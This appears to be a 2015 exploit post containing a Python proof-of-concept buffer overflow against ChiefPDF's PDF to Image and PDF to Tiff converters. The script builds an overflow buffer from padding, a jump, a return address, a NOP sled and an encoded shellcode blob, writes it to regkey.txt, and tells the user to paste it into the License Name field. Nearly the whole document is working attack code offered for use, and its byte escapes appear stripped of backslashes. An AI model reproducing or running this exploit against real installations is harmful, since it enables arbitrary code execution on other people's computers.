ChiefPDF Buffer Overflow
Posted on 24 August 2015
#!/usr/bin/python #Exploit Title:ChiefPDF Software Buffer Overflow #vulnerable programs: #PDF to Image Converter 2.0 #PDF to Image Converter Free 2.0 #PDF to Tiff Converter 2.0 #PDF to Tiff Converter Free 2.0 #Software Link:http://www.soft32.com/publishers/chiefpdf/ #Author: metacom - twitter.com/m3tac0m #Tested on: Win-Xp-sp3, Win-7, Win-8.1 #How to use:Copy the AAAA...string from regkey.txt and paste->Registration - License Name: buffer="A" * 544 buffer+="xebx06x90x90" buffer+="x8Bx89x03x10"# 1003898B 5E POP ESI buffer+="x90" * 80 buffer+=("xbax50x3exf5xa5xdaxd7xd9x74x24xf4x5bx31xc9xb1" "x33x83xc3x04x31x53x0ex03x03x30x17x50x5fxa4x5e" "x9bx9fx35x01x15x7ax04x13x41x0fx35xa3x01x5dxb6" "x48x47x75x4dx3cx40x7axe6x8bxb6xb5xf7x3dx77x19" "x3bx5fx0bx63x68xbfx32xacx7dxbex73xd0x8ex92x2c" "x9fx3dx03x58xddxfdx22x8ex6axbdx5cxabxacx4axd7" "xb2xfcxe3x6cxfcxe4x88x2bxddx15x5cx28x21x5cxe9" "x9bxd1x5fx3bxd2x1ax6ex03xb9x24x5fx8exc3x61x67" "x71xb6x99x94x0cxc1x59xe7xcax44x7cx4fx98xffxa4" "x6ex4dx99x2fx7cx3axedx68x60xbdx22x03x9cx36xc5" "xc4x15x0cxe2xc0x7exd6x8bx51xdaxb9xb4x82x82x66" "x11xc8x20x72x23x93x2ex85xa1xa9x17x85xb9xb1x37" "xeex88x3axd8x69x15xe9x9dx86x5fxb0xb7x0ex06x20" "x8ax52xb9x9exc8x6ax3ax2bxb0x88x22x5exb5xd5xe4" "xb2xc7x46x81xb4x74x66x80xd6x1bxf4x48x37xbex7c" "xeax47") file = open('regkey.txt','wb') file.write(buffer); file.close()
